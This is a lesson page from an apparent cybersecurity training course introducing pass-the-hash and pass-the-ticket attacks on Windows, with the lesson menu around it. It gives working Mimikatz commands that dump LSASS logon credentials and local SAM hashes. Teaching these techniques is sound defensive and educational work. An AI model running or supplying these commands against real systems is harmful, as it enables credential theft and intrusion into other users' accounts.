Cyber Security Academy · Lesson

Pass-the-Hash and Pass-the-Ticket Attacks

Use credential hashes and Kerberos tickets to move laterally without knowing plaintext passwords.

Why These Attacks Exist

Windows credential protocols store authentication secrets (NTLM hashes, Kerberos tickets) in memory. An attacker with SYSTEM privileges can extract these secrets and reuse them to authenticate as other users without knowing passwords.

Extracting NTLM Hashes with Mimikatz

Mimikatz is the premier credential extraction tool on Windows. Running as SYSTEM/Administrator, it reads LSASS process memory to extract NTLM hashes and cleartext credentials.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

All lessons in this course

Windows Authentication: NTLM and Kerberos
Pass-the-Hash and Pass-the-Ticket Attacks
Kerberoasting and AS-REP Roasting
Active Directory Hardening

← Back to Cyber Security Academy